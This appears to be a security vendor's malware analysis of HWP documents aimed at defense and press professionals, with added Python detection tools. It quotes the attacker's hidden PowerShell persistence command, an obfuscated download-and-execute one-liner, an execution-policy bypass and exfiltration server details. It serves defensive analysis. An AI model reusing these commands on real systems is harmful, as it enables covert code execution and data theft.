AhnLab Security Emergency response Center (ASEC) has identified HWP documents with embedded OLE objects that target individuals in specific sectors such as national defense and the press. The malware is presumed to be distributed mainly through download URLs or email attachments. The file names of the distributed documents relate to national defense, unification, education, and broadcasting, suggesting that the targets are professionals working in these areas.
The HWP documents analyzed in this post largely fall into two types: one that connects to an external URL and one that drops an additional script file. Type 2 operates in much the same way as the malware covered in a previous post [1] and even uses the same FTP server password, which leads us to believe that both were made by the same threat actor.
The figure below shows a brief flow of operations of each type.
<Type 1>
This type accesses an external URL through an OLE object embedded in the HWP document. Below are the file names of the HWP documents presumed to be of this type.
| Date | File name |
|---|---|
| May 25, 2023 | Unification** cue sheet May 29 Mon.hwp |
| May 25, 2023 | 20230508_ProfessorMeetingMaterial_NewTemplate.hwp |
| May 25, 2023 | (***)2023-05-30 Material for Professor Meeting.hwp |
| May 30, 2023 | Payment Receipt (Chief ***).hwp |
| May 30, 2023 | (Template)Payment Receipt_Congratulatory and Condolence Money.hwp |
| June 22, 2023 | 20230512_MyungbakScenario_Details.hwp |
| June 22, 2023 | 1-1.Installation of a Separate Service for Research Support Within the Overseeing Organization (** University Graduate School Academic-Industry Cooperation Center).hwp |
| June 22, 2023 | Reference Material for School President for the Honorary Doctorate Awarding Ceremony of Former Prime Minister Hu** ***.hwp |
| June 23, 2023 | [Faculty Training Department-489 (Attached)] [Attachment 3] Lecturer Card (Template).hwp |
| June 29, 2023 | National Defense and Protection Sacrificed to Political Disputes.hwp |
| July 11, 2023 | ** Unification April 30 2023 (Sun).hwp |
| July 17, 2023 | Special The Agricultural Industry and Quality of Life of North Korea ** Cho.hwp |
| July 20, 2023 | 42- Wagner's Lesson (Aug 2023).hwp |
| July 24, 2023 | [Template1] Business Budget Issue Request.hwp |
| Aug 14, 2023 | Dissertation Evaluation (** Kwon).hwp |
| Sep 01, 2023 | Evidentiary Documents of Incentive Payment.hwp |
| Sep 04, 2023 | ** Unification Sep 06 Final Wednesday.hwp |
| Sep 06, 2023 | ** Kim_Statement of Honorarium Payment.hwp |
| Sep 19, 2023 | [Template_Attachment 5]_Recommender_Certificate_Template-** Jeon.hwp |
The HWP documents listed in Table 1 contain text that prompts the user to click the OLE object to run it.
The threat actor embedded an OLE object whose size exceeds the page boundaries (see Figure 3), so the object is triggered no matter where on the page the user clicks.
The embedded OLE object contains more than 5 MB of dummy bytes together with a malicious URL. When the user clicks the object, it attempts to connect to that URL.
At the time of analysis the URL was unreachable, so no further behavior could be observed. The malicious URLs identified so far are listed below. Each document carries a different parameter value, which suggests that the documents are tailored to, and tracked per, specific recipients.
- hxxp://host.sharingdocument[.]one/dashboard/explore/starred?hwpview=[specific value]
- hxxp://mail.smartprivacyc[.]com/get/account/view?myact=[specific value]
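As an added example (not ASEC's own tooling), the following Python script shows how an analyst could triage the Type 1 objects described above: it inflates an HWP BinData stream the way the format stores it (raw DEFLATE), pulls out ASCII and UTF-16LE URLs, and measures how much of the object is padding. The thresholds, the placeholder host example.invalid, the 64 KB sample padding, and the reader for real files via the third-party olefile package are assumptions of this example; the sample stream is constructed inline.

```python
import re
import zlib
from collections import Counter
from dataclasses import dataclass, field

# Thresholds are this example's assumptions, derived from the behaviour described
# above: an OLE object padded with more than 5 MB of dummy bytes plus a URL.
DUMMY_SIZE_THRESHOLD = 5 * 1024 * 1024
DUMMY_RATIO_THRESHOLD = 0.90

# URLs may be stored as plain ASCII or as UTF-16LE (interleaved NUL bytes).
URL_ASCII = re.compile(rb"https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+")
URL_UTF16 = re.compile(rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


@dataclass
class BinDataFinding:
    decompressed_size: int
    dummy_byte: int          # most frequent byte value in the decompressed stream
    dummy_ratio: float       # share of the stream made up of that byte
    urls: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A URL-bearing object that is either huge or almost entirely padding.
        return bool(self.urls) and (
            self.decompressed_size >= DUMMY_SIZE_THRESHOLD
            or self.dummy_ratio >= DUMMY_RATIO_THRESHOLD
        )


def inflate_hwp_stream(raw: bytes) -> bytes:
    """HWP 5.0 BinData streams are raw DEFLATE (no zlib header, wbits=-15).
    Uncompressed streams are returned unchanged."""
    try:
        return zlib.decompress(raw, -15)
    except zlib.error:
        return raw


def extract_urls(data: bytes) -> list:
    urls = {m.group(0).decode("ascii", "replace") for m in URL_ASCII.finditer(data)}
    urls.update(m.group(0).decode("utf-16-le", "replace") for m in URL_UTF16.finditer(data))
    return sorted(urls)


def scan_bindata_stream(raw: bytes) -> BinDataFinding:
    data = inflate_hwp_stream(raw)
    if not data:
        return BinDataFinding(0, 0, 0.0, [])
    byte, count = Counter(data).most_common(1)[0]
    return BinDataFinding(len(data), byte, count / len(data), extract_urls(data))


def scan_hwp_file(path: str) -> dict:
    """Scan every stream under the BinData storage of an HWP 5.0 file.
    Needs the third-party 'olefile' package (assumption); imported lazily so the
    in-memory sample below runs without it."""
    import olefile
    ole = olefile.OleFileIO(path)
    try:
        return {
            "/".join(entry): scan_bindata_stream(ole.openstream(entry).read())
            for entry in ole.listdir(streams=True, storages=False)
            if entry[0] == "BinData"
        }
    finally:
        ole.close()


def deflate_raw(blob: bytes) -> bytes:
    """Compress the way HWP stores BinData, so the constructed sample round-trips."""
    comp = zlib.compressobj(level=9, wbits=-15)
    return comp.compress(blob) + comp.flush()


# Constructed sample, not a real BinData stream: 64 KB of NUL padding followed by a
# UTF-16LE URL on a placeholder host. The real objects carry over 5 MB of padding.
SAMPLE_URL = "http://example.invalid/dashboard/explore/starred?hwpview=test"
SAMPLE_STREAM = deflate_raw(b"\x00" * 65536 + SAMPLE_URL.encode("utf-16-le") + b"\x00\x00")
BENIGN_STREAM = deflate_raw(b"An ordinary embedded object body with no link in it.")

if __name__ == "__main__":
    for name, stream in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        finding = scan_bindata_stream(stream)
        print(name, finding.suspicious, finding.urls, round(finding.dummy_ratio, 3))
```

The dummy-ratio check matters more than the size check in practice: a padded object that has been truncated or re-saved by a sandbox can fall under 5 MB while still being almost entirely one byte value.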
<Type 2>
This type carries a malicious script file embedded in the HWP document and ultimately executes additional script code hosted on GitHub. Below are the file names of the HWP documents presumed to be of this type.
| Date | File name |
|---|---|
| July 31, 2023 | test.hwp |
| July 27, 2023 | Honorarium Information_aa.hwp |
| Aug 31, 2023 | Consultation Request.hwp |
| Sep 01, 2023 | Honorarium Template.hwp |
| Sep 14, 2023 | main.hwp |
| Oct 04, 2023 | test1.hwp |
| Oct 04, 2023 | cna[q].hwp |
The document test1.hwp listed in Table 2 contains two file attachments and an embedded hyperlink that executes the attached script file (zz.bat).
When the HWP document is opened, the files zz.bat and oz.txt are created in the %temp% folder. zz.bat is executed when the user clicks either the blank area that carries the embedded hyperlink or the zz.bat file icon.
zz.bat contains PowerShell commands that read a GitHub address from oz.txt, then download and execute additional data from that address.
Thus, when zz.bat is executed, it ultimately connects to hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt and executes the malicious script hosted there.
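As an added detection example, not part of the original post, the following Python correlates constructed Sysmon-style events to catch the Type 2 sequence just described: a document reader writes a script into %temp%, and that script is executed shortly afterwards. The process name Hwp.exe, the list of reader processes, the record layout, and all of the sample events are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from datetime import datetime

# Document readers that should never be the origin of a script that later runs.
# "Hwp.exe" (Hancom Office) is this example's assumption for the HWP viewer.
READER_IMAGES = {"hwp.exe", "hwpviewer.exe", "winword.exe", "excel.exe", "acrord32.exe"}
# Script-like files written directly under a Temp directory.
TEMP_SCRIPT = re.compile(r"\\temp\\[^\\]+\.(?:bat|cmd|vbs|js|ps1)$", re.I)


@dataclass
class Alert:
    script: str
    dropper_image: str
    executor_image: str
    parent_is_dropper: bool   # was the executing process spawned by the reader?
    seconds_between: int


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _ts(ev: dict) -> datetime:
    return datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")


def correlate_dropped_script_exec(events: list) -> list:
    """Pair every script a reader process wrote into Temp (Sysmon Event 11, FileCreate)
    with any later process creation (Event 1) whose command line names that file."""
    dropped = {}   # lower-cased path -> the FileCreate event that wrote it
    alerts = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if ev["EventID"] == 11:
            path = ev["TargetFilename"]
            if _basename(ev["Image"]) in READER_IMAGES and TEMP_SCRIPT.search(path):
                dropped[path.lower()] = ev
        elif ev["EventID"] == 1:
            cmd = ev.get("CommandLine", "").lower()
            for path, drop in dropped.items():
                if path in cmd:
                    alerts.append(Alert(
                        script=drop["TargetFilename"],
                        dropper_image=drop["Image"],
                        executor_image=ev["Image"],
                        parent_is_dropper=ev.get("ParentProcessGuid") == drop["ProcessGuid"],
                        seconds_between=int((_ts(ev) - _ts(drop)).total_seconds()),
                    ))
    return alerts


# Constructed Sysmon-style records (not real telemetry) modelling the zz.bat chain,
# plus benign noise from an installer that writes and runs its own batch file.
SAMPLE_EVENTS = [
    {"EventID": 11, "UtcTime": "2023-10-04 09:12:01", "ProcessGuid": "{A}",
     "Image": r"C:\Program Files\Hnc\Office\Hwp.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\oz.txt"},
    {"EventID": 11, "UtcTime": "2023-10-04 09:12:01", "ProcessGuid": "{A}",
     "Image": r"C:\Program Files\Hnc\Office\Hwp.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\zz.bat"},
    {"EventID": 1, "UtcTime": "2023-10-04 09:12:40", "ProcessGuid": "{B}", "ParentProcessGuid": "{A}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'C:\Windows\System32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\zz.bat" "'},
    {"EventID": 1, "UtcTime": "2023-10-04 09:12:41", "ProcessGuid": "{C}", "ParentProcessGuid": "{B}",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -WindowStyle Hidden -command ..."},
    {"EventID": 11, "UtcTime": "2023-10-04 10:00:00", "ProcessGuid": "{D}",
     "Image": r"C:\Users\user\Downloads\setup.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\post_install.bat"},
    {"EventID": 1, "UtcTime": "2023-10-04 10:00:01", "ProcessGuid": "{E}", "ParentProcessGuid": "{D}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\user\AppData\Local\Temp\post_install.bat"'},
]

if __name__ == "__main__":
    for alert in correlate_dropped_script_exec(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the writer of the file rather than on the file name, so renaming zz.bat does not evade it; oz.txt is deliberately ignored because a .txt written by a reader is routine, and it only becomes interesting once the batch file that reads it is executed.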
down.txt, info.txt, and upload.txt, seen in Figure 10, are all hosted in obfuscated form. After being fetched from their respective URLs, they are deobfuscated with a fixed key value and then executed.
The PowerShell script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt contains four functions, briefly described below.
| Function Name | Feature |
|---|---|
| mainFunc | Changes the PowerShell execution policy, then calls the other functions in order: getinfo, uploadResult, downCommand |
| getinfo | Executes the script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt; collects user PC information such as network configuration |
| uploadResult | Executes the script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt; uploads the collected information to the threat actor's FTP server |
| downCommand | Executes the script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt; creates additional malicious files |
The function mainFunc, which runs first, changes the current user's PowerShell execution policy with the following command so that the PowerShell scripts downloaded later can run. Note that the execution policy only governs script files; the inline -command and Invoke-Expression calls used elsewhere in this chain are not subject to it, so the change removes a hurdle for any dropped .ps1 files rather than defeating a security boundary.
- Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force
The function getinfo executes an obfuscated script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/info.txt.
The deobfuscated info.txt script collects user information and stores it in the file %APPDATA%\Ahnlab\Ahnlab.hwp.
The table below shows the collected pieces of information.
| Command | Collected Information |
|---|---|
| Get-ChildItem ([Environment]::GetFolderPath("Recent")) | List of recently used files |
| ipconfig /all | Network configuration |
| Get-Process | List of running processes |
The function uploadResult likewise executes an obfuscated script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/upload.txt.
The deobfuscated upload.txt script sends the file containing the collected information (%APPDATA%\Ahnlab\Ahnlab.hwp) to the threat actor and then deletes it. The threat actor used FTP to collect the exfiltrated data:
- Address: plm.myartsonline[.]com
- User name: 4154836
The function downCommand, which is executed next, runs the obfuscated script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/down.txt.
The down.txt script creates an additional malicious file so that the malware maintains persistence: the threat actor drops an LNK file in the Startup folder so that the malicious script keeps being executed.
The created LNK file contains a command that executes the file thumbs.log.
thumbs.log contains a PowerShell command that executes the script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
As a result, the script hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt runs every time the user logs on, and therefore after every restart of the PC.
- LNK file command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -command &{[string]$x= [IO.File]::ReadAllText('C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log');invoke-expression $x}
- thumbs.log data
[string]$a = {(New-Object Net.WebClient).Doqwertyutring('hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt')};$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c
Note that the string DownloadString never appears in thumbs.log on disk: the script block is cast to a string, the .replace call turns Doqwertyutring into DownloadString at run time, iex then performs the download, and the second invoke-expression runs whatever pq.txt returns.
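The persistence chain above can be triaged statically. As an added example, not code from the post, the Python below reassembles keywords that were split with .replace (the Doqwertyutring trick that hides DownloadString at rest), then checks the result for the hidden-window, file-to-Invoke-Expression, and WebClient download patterns seen in the LNK command and thumbs.log. The two inputs are the strings quoted above with the URL left defanged; the indicator names and the treatment of PowerShell's -replace operator as a Python regex are this example's assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed inputs: the persistence command line and the thumbs.log one-liner as
# quoted above, with the URL left defanged exactly as the post shows it.
LNK_COMMAND = (
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden "
    r"-command &{[string]$x= [IO.File]::ReadAllText("
    r"'C:\Users\[user]\AppData\Roaming\Microsoft\Windows\thumbs.log');invoke-expression $x}"
)
THUMBS_LOG = (
    "[string]$a = {(New-Object Net.WebClient).Doqwertyutring("
    "'hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt')};"
    "$b=$a.replace('qwertyu','wnloadS');$c=iex $b;invoke-expression $c"
)

# .replace('old','new') method calls (literal) and the -replace operator (regex).
REPLACE_CALL = re.compile(r"""\.replace\(\s*(['"])(.*?)\1\s*,\s*(['"])(.*?)\3\s*\)""", re.I)
REPLACE_OP = re.compile(r"""-replace\s+(['"])(.*?)\1\s*,\s*(['"])(.*?)\3""", re.I)

# Indicator names are this example's own labels.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "file_to_iex": re.compile(r"ReadAllText\(.*?\).*?(?:invoke-expression|\biex\b)", re.I | re.S),
    "web_download": re.compile(r"Net\.WebClient.*?DownloadString", re.I | re.S),
    "github_raw": re.compile(r"raw\.githubusercontent", re.I),
    "iex": re.compile(r"invoke-expression|\biex\b", re.I),
}
URL = re.compile(r"h[xt]{2}ps?://[^\s'\"()]+", re.I)


def unroll_string_replaces(script: str, max_rounds: int = 10) -> str:
    """Statically apply every string replace the script performs on itself, so a
    keyword split at rest ('Doqwertyutring' + replace -> 'DownloadString') is
    reassembled without executing anything. Repeats until the text stops changing;
    max_rounds bounds replaces that reintroduce their own pattern."""
    text = script
    for _ in range(max_rounds):
        updated = text
        for m in REPLACE_CALL.finditer(text):
            old, new = m.group(2), m.group(4)
            if old:
                updated = updated.replace(old, new)
        for m in REPLACE_OP.finditer(text):
            try:
                # Approximation: PowerShell's -replace is .NET regex, close to Python's.
                updated = re.sub(m.group(2), m.group(4), updated)
            except re.error:
                continue  # malformed pattern; leave the text alone
        if updated == text:
            break
        text = updated
    return text


@dataclass
class Verdict:
    deobfuscated: str
    indicators: list = field(default_factory=list)
    urls: list = field(default_factory=list)


def analyze(script: str) -> Verdict:
    clear = unroll_string_replaces(script)
    hits = [name for name, rx in INDICATORS.items() if rx.search(clear)]
    return Verdict(clear, hits, URL.findall(clear))


if __name__ == "__main__":
    for label, text in (("LNK command", LNK_COMMAND), ("thumbs.log", THUMBS_LOG)):
        v = analyze(text)
        print(label, v.indicators, v.urls)
```

Running the indicator regexes only after unrolling is the point: a signature for DownloadString fails against thumbs.log as written, while the same signature fires once the .replace has been applied to the text.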
While no malicious behavior beyond the collection of user information has been observed so far, the threat actor can perform a variety of malicious actions simply by changing the command hosted at hxxps://raw.githubusercontent[.]com/babaramam/repo/main/pq.txt.
With the malware from the June post [2] also being distributed through HWP documents, multiple malicious HWP documents are currently in circulation. Users should check the author and sender before opening an HWP document, and should not click on embedded objects or links in documents from unverified sources.
[File Detection]
Downloader/HWP.Agent (2023.06.27.00)
Downloader/HWP.Generic (2023.08.16.03)
Dropper/HWP.Generic (2023.10.18.02)
Downloader/PowerShell.Agent (2023.10.19.00)
Downloader/BAT.Agent (2023.10.19.00)
Trojan/LNK.Runner (2023.10.18.03)
Downloader/PowerShell.Generic (2023.10.18.03)
Trojan/PowerShell.Agent (2023.10.18.03)
Data/BIN.Encoded (2023.10.26.02)
[IOC]
<hwp>
2f0a67b719d8303c0ec7cc9057ed8411
af5bbab33f934dc016fc1aa0d910820e
7f3a30525b9324a2aeb32a9018df944f
361237b6b385874f02f3724ae50d1522
a242741873637fdac8f69f2ffdba47bc
<script>
7284a6376aa79a2384f797769b7ce086
2ef182bced72da507d2e403ab9db3c9f
f416b44332b4fb394b4735634cb07ff2
c16796909d5feea709d99e306f7e9975
0217e70fd7bc3a65ee0f2dd60ff85fbf
d5d395d90ccf9a7309f2f64169a2c019
8cafe74f03605a9bfaea5081b3ed0fc2
4934226f319d82ae092ada2525a7feb5
1061425d7e3d054a79f9294a2118b5da
2773acee87413790e9ace99c536c78ad
77edb140b86596eabe3602bb7febb997
<C2>
hxxp://host.sharingdocument.one/dashboard/explore/starred?hwpview=
hxxp://mail.smartprivacyc.com/get/account/view?myact=
Source: https://asec.ahnlab.com/en/58335/